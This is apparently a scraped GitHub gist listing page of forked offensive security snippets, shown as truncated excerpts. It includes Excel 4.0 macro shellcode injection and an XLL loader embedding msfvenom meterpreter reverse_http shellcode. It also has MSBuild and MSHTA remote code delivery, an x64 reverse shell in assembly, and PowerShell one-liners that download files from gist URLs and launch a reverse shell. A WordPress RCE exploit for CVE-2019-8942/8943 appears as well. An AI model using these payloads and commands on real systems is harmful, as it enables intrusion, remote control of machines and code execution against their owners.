FlatL1ne FlatL1neAPT

FlatL1neAPT / shellcode.xlsm
Created May 28, 2019 — forked from Arno0x/shellcode.xlsm
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
View shellcode.xlsm
Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".
================================================================================
Paste this in cells in column A, starting in cell A1:
================================================================================
=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)
View msbuild_14_xsltransformation.csproj
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="RunMe">
<XslTransformation
UseTrustedSettings="true"
XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
OutputPaths="delete_me.txt" />
</Target>
</Project>
FlatL1neAPT / poc.png
Created May 21, 2019 — forked from caseysmithrc/poc.png
MSBuild - Property functions -
View poc.png
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View noscript-tracking.go
// Tracking cursor position in real-time without JavaScript
// Demo: https://twitter.com/davywtf/status/1124146339259002881
package main
import (
"fmt"
"net/http"
"strings"
)
FlatL1neAPT / TestMSHTAShellcodeDelivery.ps1
Created Apr 11, 2019 — forked from caseysmithrc/TestMSHTAShellcodeDelivery.ps1
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
View TestMSHTAShellcodeDelivery.ps1
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credits for CACTUSTORCH HERE
I was in escape sequence hell ;-)
' ( ) ( )
View shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
unsigned char b[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
FlatL1neAPT / VitaLoader.java
Created Mar 11, 2019 — forked from xerpi/Now has a repository
Ghidra Vita loader script
View VitaLoader.java
//@author Sergi Granell
//@category _NEW_
//@keybinding
//@menupath
//@toolbar
/*
* This script depends on the yamlbeans library.
* Download the JAR from https://github.com/EsotericSoftware/yamlbeans/releases
* and add the path to Ghidra's "Edit" -> "Plugin Path..." configuration.
View reverse-tcs-auth-shell.nasm
; =================================================
; Password protected x64 TCP Reverse Shell
; Author: Alan Vivona
; =================================================
global _start
; Syscall numbers
syscalls.socket equ 0x29
syscalls.bind equ 0x31
FlatL1neAPT / PowerShell_Command.txt
Created Mar 5, 2019 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
View PowerShell_Command.txt
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof
FlatL1neAPT / wordpress-rce.js
Created Mar 3, 2019 — forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
View wordpress-rce.js
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);